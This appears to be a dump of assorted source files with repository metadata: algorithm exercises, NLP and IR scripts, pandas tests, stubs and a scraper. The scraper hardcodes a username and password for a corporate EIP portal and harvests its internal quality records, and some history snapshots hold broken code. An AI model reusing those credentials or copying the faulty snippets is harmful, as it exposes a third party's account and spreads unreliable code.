cb82788b9ff75cd86e49bf69fbcec4111a67aa5a | 2c760f659bc7e0415142421fb6c540cfd98b6152 | /stem_word.py | 9e8999e197038c72ad4a7266f92cf25d928cf8e7 | [] | no_license | edimaudo/Natural-Language-Processing | 32c9279e2ac44eba6b2502e14a3a4759d0d889bd | c659e8b14b0dd0fd9b7d115496053d7204b1ccc5 | refs/heads/master | 2021-01-12T10:41:15.490730 | 2017-02-19T22:34:39 | 2017-02-19T22:34:39 | 72,611,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
ps = PorterStemmer()
example_words = ["python","pythoner","pythoning","pythoned","pythonly"]
python_stem = [ps.stem(word) for word in example_words]
new_text = "It is important to by very pythonly while you are pythoning with python. All pythoners have pythoned poorly at least once."
words = word_tokenize(new_text)
new_text_stem = [ps.stem(word) for word in words]
print(new_text_stem)
| [
"[email protected]"
] | |
bc8d71d97141ecbdf9574f4745d8a3f290be2c6f | 1d2258fbd69719dfe3f3be87f2cf91d13ad655a1 | /Algorithms/Arrays & Strings/print_subarray_0_sum.py | d7ad46d13fe33149c8806a3eac42692f71478e2c | [] | no_license | skhan75/CoderAid | 83625edd52fbe8619d8cc280338da86cf93ecd80 | ec898cb59bd136c4a6cdc8a32c399896febc483e | refs/heads/master | 2023-08-31T14:22:59.778094 | 2023-08-30T05:19:09 | 2023-08-30T05:19:09 | 144,413,708 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 904 | py | """
Given an array of integers, print all subarrays with 0 sum
"""
from collections import defaultdict
def print_subarrays_with_0_sum(arr):
s = defaultdict(list)
s[0].append(-1)
solution = []
sum = 0
for i in range(len(arr)):
sum += arr[i]
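        # a prefix sum seen before at index j means arr[j+1..i] sums to zero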
if (sum in s):
# find all sub-arrays with same sum
lst = s[sum]
for val in lst:
solution.append((val+1, i))
s[sum].append(i)
return solution
import unittest
class Test(unittest.TestCase):
def test_print_subarrays_with_0_sum(self):
test_data = [[3, 4, -7, 3, 1, 3, 1, -4, -2, -2]]
expected = [ [(0, 2), (1, 3), (2, 5), (5, 7), (0, 9), (3, 9)] ]
for idx, t in enumerate(test_data):
res = print_subarrays_with_0_sum(t)
self.assertEqual(res, expected[idx])
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
7137748277f1cd63223ab231f1e78babfc251b80 | ea2d80ac6733210b7841121ce0592a7d591cfa76 | /iprPy/workflow/prepare/relax_static.py | 524cc27724e29c9002303f32eae42c299a8a443d | [] | no_license | StriderO/iprPy | ab0b6b271bb32688dfe7a30866ecc9eaa2c7432e | 49d25adf1c9ac0a52f8fbb726efdfec0c952c989 | refs/heads/master | 2022-12-21T22:29:46.670132 | 2020-09-25T16:58:40 | 2020-09-25T16:58:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,947 | py | # Standard Python libraries
import sys
# iprPy imports
from . import prepare
calculation_name = 'relax_static'
def main(database_name, run_directory_name, lammps_command, **kwargs):
"""
Prepares relax_static calculations from reference_crystal and E_vs_r_scan
records.
buildcombos
- reference : atomicreference from reference_crystal
- parent : atomicparent from calculation_E_vs_r_scan
Parameters
----------
database_name : str
The name of the pre-set database to use.
run_directory_name : str
The name of the pre-set run_directory to use.
lammps_command : str
The LAMMPS executable to use.
**kwargs : str or list, optional
Values for any additional or replacement prepare parameters.
"""
# Set default branch value to match current function's name
kwargs['branch'] = kwargs.get('branch', sys._getframe().f_code.co_name)
script = "\n".join(
[
# Build load information based on reference structures
'buildcombos atomicreference load_file reference',
# Build load information from E_vs_r_scan results
'buildcombos atomicparent load_file parent',
# Specify parent buildcombos terms (parent record's style and the load_key to access)
'parent_record calculation_E_vs_r_scan',
'parent_load_key minimum-atomic-system',
# System manipulations
'sizemults 10 10 10',
# Run parameters
'energytolerance 0.0',
'forcetolerance 1e-10 eV/angstrom',
'maxiterations 10000',
'maxevaluations 100000',
'maxatommotion 0.01 angstrom',
'maxcycles 100',
'cycletolerance 1e-10',
])
# Add additional required terms to kwargs
kwargs['lammps_command'] = lammps_command
# Prepare
prepare(database_name, run_directory_name, calculation_name,
script, **kwargs)
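# Example invocation (all three argument values below are hypothetical placeholders):
#   main('my_database', 'my_run_directory', 'lmp_mpi')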
def from_dynamic(database_name, run_directory_name, lammps_command, **kwargs):
"""
Prepares relax_static calculations from relax_dynamic records.
buildcombos
- archive : atomicarchive from calculation_relax_dynamic
Parameters
----------
database_name : str
The name of the pre-set database to use.
run_directory_name : str
The name of the pre-set run_directory to use.
lammps_command : str
The LAMMPS executable to use.
**kwargs : str or list, optional
Values for any additional or replacement prepare parameters.
"""
# Set default branch value to match current function's name
kwargs['branch'] = kwargs.get('branch', sys._getframe().f_code.co_name)
script = "\n".join(
[
# Build load information from relax_dynamic results
'buildcombos atomicarchive load_file archive',
# Specify archive parent buildcombos terms (parent record's style and the load_key to access)
'archive_record calculation_relax_dynamic',
'archive_branch main',
'archive_load_key final-system',
# System manipulations
'sizemults 1 1 1',
# Run parameters
'energytolerance 0.0',
'forcetolerance 1e-10 eV/angstrom',
'maxiterations 10000',
'maxevaluations 100000',
'maxatommotion 0.01 angstrom',
'maxcycles 100',
'cycletolerance 1e-10',
])
# Add additional required terms to kwargs
kwargs['lammps_command'] = lammps_command
# Prepare
prepare(database_name, run_directory_name, calculation_name,
script, **kwargs) | [
"[email protected]"
] | |
c9dba315b8af82eb804dd2e52ca45dde170c6ae8 | 929fc8dd47b91c963c8c2f81d88e3d995a9dfc7c | /src/DP/easy/64_Minimum_Path_Sum.py | 7389b32a1fa43870020e855bad013a3e89549215 | [] | no_license | 1325052669/leetcode | fe7571a9201f4ef54089c2e078810dad11205b14 | dca40686c6a280bd394feb8e6e78d40eecf854b9 | refs/heads/master | 2023-04-01T17:53:30.605822 | 2021-04-10T15:17:45 | 2021-04-10T15:17:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from typing import List
class Solution:
def minPathSum(self, grid: List[List[int]]) -> int:
m = len(grid)
n = len(grid[0])
dp = [[0] * n for _ in range(m)]
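        # dp[i][j]: minimum path sum from cell (i, j) down to the bottom-right corner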
dp[-1][-1] = grid[-1][-1]
for i in range(n - 2, -1, -1):
dp[-1][i] = dp[-1][i + 1] + grid[-1][i]
for i in range(m - 2, -1, -1):
dp[i][-1] = dp[i + 1][-1] + grid[i][-1]
for i in range(m - 2, -1, -1):
for j in range(n - 2, -1, -1):
dp[i][j] = min(dp[i + 1][j], dp[i][j + 1]) + grid[i][j]
return dp[0][0]
def main():
print(Solution().minPathSum([[1,3,1],[1,5,1],[4,2,1]]))
if __name__=='__main__':
main() | [
"[email protected]"
] | |
76b17a6841aa8fe14ed93b17483f10d58534b25a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_pupae.py | 99416f9ced84f392cfabb21eec716d975befdd8f | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
# class header
class _PUPAE():
def __init__(self,):
self.name = "PUPAE"
        self.definitions = 'pupa'  # assumed base-form string; the bare name here would be undefined
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['pupa']
| [
"[email protected]"
] | |
fbac1c282e8dd5a8c6c3876e5f54ef6e3c44cdf8 | 7d096568677660790479d87c22b47aae838ef96b | /stubs/System/Windows/Media/Animation_parts/FillBehavior.pyi | 15af9862d0aa4e8dff7d4511c4d3fa4002704cfe | [
"MIT"
] | permissive | NISystemsEngineering/rfmx-pythonnet | 30adbdd5660b0d755957f35b68a4c2f60065800c | cd4f90a88a37ed043df880972cb55dfe18883bb7 | refs/heads/master | 2023-02-04T00:39:41.107043 | 2023-02-01T21:58:50 | 2023-02-01T21:58:50 | 191,603,578 | 7 | 5 | MIT | 2023-02-01T21:58:52 | 2019-06-12T16:02:32 | Python | UTF-8 | Python | false | false | 1,045 | pyi | class FillBehavior(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies how a System.Windows.Media.Animation.Timeline behaves when it is outside its active period but its parent is inside its active or hold period.
enum FillBehavior,values: HoldEnd (0),Stop (1)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
HoldEnd=None
Stop=None
value__=None
| [
"[email protected]"
] | |
9b82980d0ba80121a3e74d36257439bd9ad7a282 | e27333261b8e579564016c71d2061cc33972a8b8 | /.history/api/IR_engine_20210726210035.py | e231b53c33eec2a63c2f86870be7824dac22af35 | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,990 | py | import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics.pairwise import euclidean_distances
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
file_path = r"D:\Desktop\IR_term_8\IR-tweets---disaster-\article_titles.csv"
def setup_app():
df = pd.read_csv(file_path)
df.head()
return
class DataProcessor:
def __init__(self, filename, col):
self.data = pd.read_csv(filename, names=col)
self.data.topic = self.data.topic.astype(str)
self.porter = PorterStemmer()
def tokenize_stem_lower(self, text):
tokens = word_tokenize(text)
tokens = list(filter(lambda x: x.isalpha(), tokens))
tokens = [self.porter.stem(x.lower()) for x in tokens]
return ' '.join(tokens)
def get_clean_data(self):
self.data['clean_text'] = self.data.apply(lambda x: self.tokenize_stem_lower(x.text), axis=1)
return self.data
class CosineSimilarity:
def __init__(self, data, type='tfidf'):
self.data = data
self.change_matrix_type(type)
def get_result(self, return_size):
cos_sim = cosine_similarity(self.matrix, self.matrix)
top_ind = np.flip(np.argsort(cos_sim[0]))[1:return_size+1]
top_id = [list(self.matrix.index)[i] for i in top_ind]
# print(top_10_ind ,top_10_id)
self.result = []
for i in top_id:
filt = self.data[self.data.document==i]
for ind, r in filt.iterrows():
rel = r['rel']
text = r['text']
related = r['topic']
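                # score: 1 = labelled relevant for the queried article,
                # -1 = labelled non-relevant for it, 0 = tied to a different article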
score = 0
if related==self.query_id and rel>0:
score = 1
if related==self.query_id and rel==0:
score = -1
self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
def query(self, query_id, query_text, return_size=10):
self.query_id = query_id
term_doc = self.vec.fit_transform([query_text]+list(self.data.clean_text))
ind = ['query'] + list(self.data.document)
self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.vec.get_feature_names(), index=ind)
self.get_result(return_size)
return pd.DataFrame(self.result)
def change_matrix_type(self, type):
if type == 'tfidf':
self.vec = TfidfVectorizer()
elif type == 'dt':
self.vec = CountVectorizer()
else:
print('Type is invalid')
def get_matrix(self):
return self.matrix
class EuclideanDistance:
def __init__(self, data, type='tfidf'):
self.data = data
self.change_matrix_type(type)
self.matrix = None
def get_result(self, return_size):
euclidean = euclidean_distances(self.matrix.values[1:], [self.matrix.values[0]])
top_ind = np.argsort(euclidean.T[0])[:return_size]
top_id = [list(self.matrix.index)[i] for i in top_ind]
# print(sorted(euclidean[:20]),top_10_ind ,top_10_id)
self.result = []
for i in top_id:
filt = self.data[self.data.document==i]
for ind, r in filt.iterrows():
rel = r['rel']
text = r['text']
related = r['topic']
score = 0
if related==self.query_id and rel>0:
score = 1
if related==self.query_id and rel==0:
score = -1
self.result.append({'tweet_id':i, 'text': text, 'related_article':related,'score': score})
def query(self, query_id, query_text, return_size=10):
self.query_id = query_id
term_doc = self.vec.fit_transform([query_text]+list(self.data.clean_text))
ind = ['query'] + list(self.data.document)
self.matrix = pd.DataFrame(term_doc.toarray(), columns=self.vec.get_feature_names(), index=ind)
self.get_result(return_size)
return pd.DataFrame(self.result)
def change_matrix_type(self, type):
if type == 'tfidf':
self.vec = TfidfVectorizer()
elif type == 'dt':
self.vec = CountVectorizer()
else:
print('Type is invalid')
def get_matrix(self):
return self.matrix
setup_app() | [
"[email protected]"
] | |
9a9d2b165bcf57f9c995dc84c76a5a4c0ce28848 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_048/ch41_2020_04_01_00_06_34_049221.py | cd859ef2d7ab02257d808cf886da81b08617b92a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | def zera_negativos(x):
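    # replaces every negative element of x with 0, in place, and returns the list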
t=0
i=len(x)
while t<i:
if x[t]<0:
del x[t]
x.insert(t,0)
t=t+1
return(x) | [
"[email protected]"
] | |
3ad9a37e9e171f8ce39f37f8c3144b8607c507e5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02743/s099779834.py | 4b687207109d093383b7555f1da3abd4b8869ca0 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | from decimal import *
import math
getcontext().prec=1000
a,b,c=map(int,input().split())
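# tests sqrt(a) + sqrt(b) < sqrt(c) by squaring: a + b + 2*sqrt(a*b) < c
# (high-precision Decimal avoids floating-point rounding at the boundary)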
if a+b+2*Decimal(a*b).sqrt()<c:
print("Yes")
else:
print("No")
| [
"[email protected]"
] | |
70a01c59b4b664ef0db8aafc1fd97e28296a1324 | 7b91755b1c777248050f3cadf23ed34d1f10adef | /Section8/60.py | a2fc429546aa3f6d74048e164cf5b4b61fb82a4c | [] | no_license | JAntonioMarin/PythonBootcamp | ef2976be0204df44e0c56a521628c73a5d274008 | 6e4af15b725913d3fda60599792e17d7d43d61d2 | refs/heads/master | 2021-01-06T16:52:57.537678 | 2020-03-26T17:36:50 | 2020-03-26T17:36:50 | 241,406,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | my_list = [1, 2, 3]
my_set = set()
print(type(my_set))
class SampleWord():
pass
my_sample = SampleWord()
print(type(my_sample))
class Dog():
def __init__(self, breed, name, spots):
# Attributes
# We take in the argument
# Assign it using self.attribute_name
self.breed = breed
self.name = name
# Expect boolean True/False
self.spots = spots
# my_dog = Dog('Lab')
my_dog = Dog(breed='Huskie', name='Sammy', spots=False)
print(my_dog.breed)
print(my_dog.name)
print(my_dog.spots)
| [
"[email protected]"
] | |
b501c00b45c1b813f628e512cd1de07a77c0582e | c2289635f088e8b0613900bfb85985fc9af8d20f | /programmers/lv3_스티커모으기2.py | be433342c5915f9810b8d2d260b116d2b96a24d6 | [] | no_license | gyoforit/study-algorithm | e91da5491c935731e754ac9f85074a97f8e48066 | af0c10e417f5d205048db268f7cc60b60b2c49cb | refs/heads/master | 2023-08-21T14:04:00.891937 | 2021-10-29T11:54:31 | 2021-10-29T11:54:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | def solution(sticker):
answer = []
L = len(sticker)
dp = [0] * L
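    # adjacent stickers can't both be taken, and the strip is circular,
    # so the first and last sticker are also mutually exclusive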
if L == 1:
return sticker[0]
    # case 1: take the first sticker (so the last sticker is excluded)
dp[0] = sticker[0]
dp[1] = sticker[0]
for i in range(2, L - 1):
dp[i] = max(dp[i - 2] + sticker[i], dp[i - 1])
answer.append(max(dp))
    # case 2: skip the first sticker
dp2 = [0] * L
dp2[1] = sticker[1]
for i in range(2, L):
dp2[i] = max(dp2[i - 2] + sticker[i], dp2[i - 1])
answer.append(max(dp2))
return max(answer) | [
"[email protected]"
] | |
84b7d546ee415702bf3a0dfe5ab42fe105e80b6c | beb22b5d1584d9962aecb547692da8a2679bd172 | /code/Toolbox/DP_AlgorithmSyn.py | 759b2bad26c043020ac9e3e1ac5fc190350614b3 | [] | no_license | 356255531/ADP_Programming_Assignment | 5fb16c8dff5a884b371a89a819cd3718c0b286d2 | e8d21b7943df806f5232e37795ae3a70a84fddd1 | refs/heads/master | 2020-06-14T10:12:35.390736 | 2017-01-13T16:47:09 | 2017-01-13T16:47:09 | 75,199,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,625 | py | import numpy as np
from StateActionSpace import StateActionSpace
from Enviroment import Enviroment
__author__ = "Zhiwei"
class DP_AlgorithmSyn(object):
"""
Parent class of DP algorithm(VI, PI)
Member function:
init_val_func_vector(val_func)
derive_policy(val_func_vector, env, state_action_space)
cal_trans_prob_mat_and_reward_vector(
action,
reward_func,
env,
state_action_space
)
"""
def init_val_func_vector(self, state_action_space):
"""
Randomly initialize the value function
            vector and assign the value of the goal state
to 100 at the end of value function vector
return numpy.mat
"""
        assert isinstance(state_action_space, StateActionSpace)
num_legal_ele = len(state_action_space.get_legal_state_space())
val_func_vector = np.random.random(num_legal_ele)
val_func_vector[-1] = 100
val_func_vector = np.mat(val_func_vector).transpose()
return val_func_vector
def derive_policy(
self,
val_func_vector,
state_action_space,
env
):
"""
Derive the policy from given vectorized value function
and legal state space
"""
policy = []
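        # greedy one-step lookahead: for each state pick the action whose
        # successor state has the highest value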
legal_state_space = state_action_space.get_legal_state_space()
action_space = state_action_space.get_action_space()
for state in legal_state_space:
max_val = -float("inf")
for action in action_space:
next_state = env.perform_action(state, action)
feature_vector = state_action_space.get_feature_vector_of_legal_state(next_state).transpose()
val_func = np.matmul(
np.mat(feature_vector),
val_func_vector
)
if val_func > max_val:
max_val = val_func
policy_temp = action
policy.append(policy_temp)
return policy
def cal_trans_prob_mat_and_reward_vector(
self,
action_sets,
reward_func,
env,
state_action_space
):
"""
            Calculate the transition probability matrix and
reward function vector of all states with given
action
return trans_prob_mat(numpy.mat), reward_vector(numpy.mat)
"""
        assert isinstance(action_sets, list)
        assert isinstance(env, Enviroment)
        assert isinstance(state_action_space, StateActionSpace)
legal_state_space = state_action_space.get_legal_state_space()
trans_prob_mat, reward_vector = np.array([]), np.array([])
for state, action in zip(legal_state_space, action_sets):
next_state = env.perform_action(state, action)
feature_vector = state_action_space.get_feature_vector_of_legal_state(next_state)
trans_prob_mat = np.append(
trans_prob_mat,
feature_vector,
)
reward = reward_func.get_reward(state, action, next_state)
reward_vector = np.append(
reward_vector,
reward,
)
num_legal_state = len(legal_state_space)
trans_prob_mat = np.mat(np.reshape(trans_prob_mat, (num_legal_state, num_legal_state)))
reward_vector = np.mat(np.reshape(reward_vector, (num_legal_state, 1)))
return trans_prob_mat, reward_vector
if __name__ == "__main__":
a = []
print np.array(a)
| [
"[email protected]"
] | |
89ebdc3767a55b1adeb10aed9f78d4153f61cd22 | f6db8d85a3b41eed543959314d65927353a8229c | /.history/W5/restaurant/views_20201202134429.py | 2fd9b255c7fc4e77e83d886775ac37fd056818d1 | [] | no_license | NFEL/DjangoPaeez99 | d573cc8e36500f08bc104d76f7a2628062d86c2f | 621636bfb47d71f2a4f45037b7264dd5ebc7cdd7 | refs/heads/main | 2023-01-27T22:05:57.788049 | 2020-12-08T10:08:28 | 2020-12-08T10:08:28 | 304,553,353 | 1 | 2 | null | 2020-10-16T07:33:04 | 2020-10-16T07:33:03 | null | UTF-8 | Python | false | false | 1,202 | py | from django.shortcuts import render, get_object_or_404
import folium
from geolocation import geolocator
from .models import Category, Element, ElementAddress
def element_list(request, cat_id, cat_title):
category_obj = get_object_or_404(Category, id=cat_id)
print(cat_title)
elements = category_obj.element_set.all()
# elements = Element.objects.filter(category=category_obj)
context = {
'category': category_obj,
'elements': elements
}
return render(request, 'element-list.html', context)
def element_detail(request, elem_id):
element = get_object_or_404(Element, id=elem_id)
    locations = []
    for loc in ElementAddress.objects.filter(element=element):
        tmp = []
        tmp.append(loc.city)
        tmp.append(loc.state)
        tmp.append(geolocator.geocode(loc.location))
        fmap = folium.Map(location=loc.location)
        folium.Marker(location=loc.location).add_to(fmap)
        tmp.append(fmap._repr_html_())
        locations.append(tmp)
context = {
'element': element,
'locations': locations,
}
return render(request, 'element-detail.html', context)
| [
"[email protected]"
] | |
dcd13b8f27011b198afbe05a69263144625e2140 | b9ca99a0244e5d5a07e0b27be8192ad01c4eda6c | /EIP/EIP_login.py | ab438374bf8e3062c20dbb32db2556a9ab704a86 | [] | no_license | Boomshakal/spider | c3fdbf18f874ec9953509e4ce984b5476d25839f | e6779a3961f48325dd4992d88f88b8b3938225d7 | refs/heads/master | 2021-06-17T06:22:19.679444 | 2021-03-05T06:33:36 | 2021-03-05T06:33:36 | 154,489,684 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,318 | py | import csv
import json
from urllib import request, parse
from http import cookiejar
from lxml import etree
# create a CookieJar instance
cookie = cookiejar.CookieJar()
# wrap it in a handler that manages the cookies
cookie_handler = request.HTTPCookieProcessor(cookie)
# handler for plain HTTP requests
http_handler = request.HTTPHandler()
# handler for HTTPS requests
https_handler = request.HTTPSHandler()
# build the opener used for every request below
opener = request.build_opener(http_handler, https_handler, cookie_handler)
def login():
'''
    Perform the initial login.
    Sends the username and password so the opener obtains the session cookie.
:return:
'''
login_url = "http://eip.megmeet.com:8008/j_acegi_security_check"
    # login_url is taken from the action attribute of the login form
    # the two keys come from the name attributes of the corresponding form inputs
data = {
"j_username": "yhs375",
"j_password": "lhm922357"
}
    # URL-encode the form data
data = parse.urlencode(data)
    # build the request object
req = request.Request(login_url, data=bytes(data,encoding='utf-8'))
    # send the request through the opener
response = opener.open(req)
def geterrInfo(page):
    # once login() has run, the opener already carries the session cookie
url = "http://eip.megmeet.com:8008/km/review/km_review_index/kmReviewIndex.do?method=list&q.mydoc=all&q.j_path=%2FlistAll&q.fdTemplate=1666236b6b0126bbc42394e49a8ae720&q.s_raq=0.006108134566174206&pageno={}&rowsize=30&orderby=docCreateTime&ordertype=down&s_ajax=true".format(page)
# data={
# 'method': 'list',
# 'q.mydoc': 'all',
# 'q.j_path': '/listAll',
# 'q.fdTemplate': '1666236b6b0126bbc42394e49a8ae720',
# 'q.s_raq': 0.8223910556245086,
# 'pageno': page,
# 'rowsize': 30,
# 'orderby': 'docCreateTime',
# 'ordertype': 'down',
# 's_ajax': True
# }
rsp = opener.open(url)
html = rsp.read().decode()
result=json.loads(html)
    with open('data.csv', 'a', encoding='utf-8', newline='') as file:
        writer = csv.writer(file)
        writer.writerow(['Initiator', 'Application No.', 'Model Part No.', 'Model Name', 'Work Order No.', 'Work Order Qty', 'Material Part No.', 'Input Qty', 'Defect Qty', 'Problem Description', 'Cause Analysis', 'Temporary Measures', 'Containment Measures',
                         'Permanent Measures', 'Effect Verification', 'Created Date', 'Owner'])
for i in result['datas']:
            fdId = i[0]['value']  # fdId is substituted into next_url for the detail-page GET
docCreateTime_time=i[6]['value']
rsp = opener.open(next_url.format(fdId))
html = rsp.read().decode()
info=etree.HTML(html).xpath('//div[@class="xform_inputText"]//text()')
print(info)
info.append(docCreateTime_time)
responsibility = etree.HTML(html).xpath('//label/xformflag/text()')
print(responsibility)
#info.append(responsibility)
            writer.writerow(info)  # write the parsed record
#writer.writerow(responsibility_department)
if __name__ == '__main__':
next_url = 'http://eip.megmeet.com:8008/km/review/km_review_main/kmReviewMain.do?method=view&fdId={}'
login()
    minpage = input('Enter the first page number: ')
    maxpage = input('Enter the last page number: ')
for i in range(int(minpage),int(maxpage)+1):
geterrInfo(i) | [
"[email protected]"
] | |
705f67f691d2f47f6a3da7ecc159f168f5560c10 | 7d2f933ed3c54e128ecaec3a771817c4260a8458 | /venv/Lib/site-packages/pandas/tests/indexing/test_coercion.py | e7b63769cbdbaae3a37fe9649e353e0cdb3afaad | [] | no_license | danielmoreira12/BAProject | c61dfb1d0521eb5a28eef9531a00e744bfb0e26a | 859f588305d826a35cc8f7d64c432f54a0a2e031 | refs/heads/master | 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,904 | py | import itertools
from typing import Dict, List
import numpy as np
import pytest
import pandas as pd
import pandas._testing as tm
import pandas.compat as compat
###############################################################
# Index / Series common tests which may trigger dtype coercions
###############################################################
@pytest.fixture(autouse=True, scope="class")
def check_comprehensiveness(request):
# Iterate over combination of dtype, method and klass
# and ensure that each are contained within a collected test
cls = request.cls
combos = itertools.product(cls.klasses, cls.dtypes, [cls.method])
def has_test(combo):
klass, dtype, method = combo
cls_funcs = request.node.session.items
return any(
klass in x.name and dtype in x.name and method in x.name for x in cls_funcs
)
for combo in combos:
if not has_test(combo):
msg = "test method is not defined: {0}, {1}"
raise AssertionError(msg.format(cls.__name__, combo))
yield
class CoercionBase:
klasses = ["index", "series"]
dtypes = [
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"timedelta64",
"period",
]
@property
def method(self):
raise NotImplementedError(self)
def _assert(self, left, right, dtype):
# explicitly check dtype to avoid any unexpected result
if isinstance(left, pd.Series):
tm.assert_series_equal(left, right)
elif isinstance(left, pd.Index):
tm.assert_index_equal(left, right)
else:
raise NotImplementedError
assert left.dtype == dtype
assert right.dtype == dtype
class TestSetitemCoercion(CoercionBase):
method = "setitem"
def _assert_setitem_series_conversion(
self, original_series, loc_value, expected_series, expected_dtype
):
""" test series value's coercion triggered by assignment """
temp = original_series.copy()
temp[1] = loc_value
tm.assert_series_equal(temp, expected_series)
# check dtype explicitly for sure
assert temp.dtype == expected_dtype
        # .loc follows a different rule; temporarily disabled
# temp = original_series.copy()
# temp.loc[1] = loc_value
# tm.assert_series_equal(temp, expected_series)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.object)],
)
def test_setitem_series_object(self, val, exp_dtype):
obj = pd.Series(list("abcd"))
assert obj.dtype == np.object
exp = pd.Series(["a", val, "c", "d"])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, np.object)],
)
def test_setitem_series_int64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4])
assert obj.dtype == np.int64
if exp_dtype is np.float64:
exp = pd.Series([1, 1, 3, 4])
self._assert_setitem_series_conversion(obj, 1.1, exp, np.int64)
pytest.xfail("GH12747 The result must be float")
exp = pd.Series([1, val, 3, 4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(np.int32(1), np.int8), (np.int16(2 ** 9), np.int16)]
)
def test_setitem_series_int8(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], dtype=np.int8)
assert obj.dtype == np.int8
if exp_dtype is np.int16:
exp = pd.Series([1, 0, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, np.int8)
pytest.xfail("BUG: it must be Series([1, 1, 3, 4], dtype=np.int16")
exp = pd.Series([1, val, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.float64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_setitem_series_float64(self, val, exp_dtype):
obj = pd.Series([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
exp = pd.Series([1.1, val, 3.3, 4.4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_setitem_series_complex128(self, val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, val, 3 + 3j, 4 + 4j])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.int64),
(3, np.int64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.bool),
],
)
def test_setitem_series_bool(self, val, exp_dtype):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool
if exp_dtype is np.int64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool)
pytest.xfail("TODO_GH12747 The result must be int")
elif exp_dtype is np.float64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool)
pytest.xfail("TODO_GH12747 The result must be float")
elif exp_dtype is np.complex128:
exp = pd.Series([True, True, True, False])
